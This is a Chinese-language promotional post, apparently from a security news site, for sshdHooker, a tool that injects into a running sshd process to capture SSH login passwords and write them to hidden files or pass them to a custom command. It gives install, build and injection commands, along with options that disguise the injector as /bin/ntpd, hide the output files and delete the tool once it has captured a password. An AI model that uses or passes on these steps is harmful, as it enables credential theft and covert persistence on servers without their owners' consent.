![图片[1]-sshdHooker记录并发送ssh登录的密码-华盟网](https://www.77169.net/wp-content/uploads/2026/04/捕获-1024x276.png)
工具介绍
一键注入SSHD进程,记录并发送ssh登录的密码。
密码记录器一键安装,仅暂时支持x64/aarch
直接执行命令
bash install.sh or bash install_aarch64.sh
直接运行后ssh密码登录,记录地址为/tmp/.password.txt,默认so地址为/tmp/hello.so,默认注入器名称为/tmp/.i
其他参数:
-s 设置要注入的sshd的进程pid,一般会默认获取,如果获取不到或者自动获取错误了再使用这个参数
-e 修改so文件的路径,默认/tmp/.g.so
-o 修改注入器的路径,默认/bin/ntpd
-m 修改mode默认值为0,输出到文件,默认记录地址为/tmp/.password.txt ,如果值为1,则会改为命令行模式
-p 修改payload,默认值为/tmp/.password.txt,如果mode值为1,则会使用snsprintf来格式化命令并且输出,请确保字符串中包含两个%s,用于格式化用户名和密码
-d 自动删除,设置为anyone则抓到密码后立刻删除,否则则抓取到设置的指定用户名后删除
-l 指定libc路径,默认寻址是寻找libc-xxxx.so和libc.so.x的方案,但是不排除会有其他奇奇怪怪的libc名称,所以添加了手动指定功能,详情可以查看/proc/pid/maps里找到libc名字
执行1
gcc -shared inject_got.c -ldl -fPIC -o test2.so -std=c99
mv test2.so /tmp/hello.so
gcc sshdHooker.c shellcode.s -g -o inject -ldl -lpthread
sudo ./inject sshd_pid
然后等待用户连接SSH并登录成功,密码保存于/tmp/.password.txt
官方链接
推荐理由
sshdHooker是一款专业的安全工具,专注于一键注入SSHD进程,记录并发送ssh登录的密码。
。
下载地址:https://github.com/9bie/sshdHooker
下载地址
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END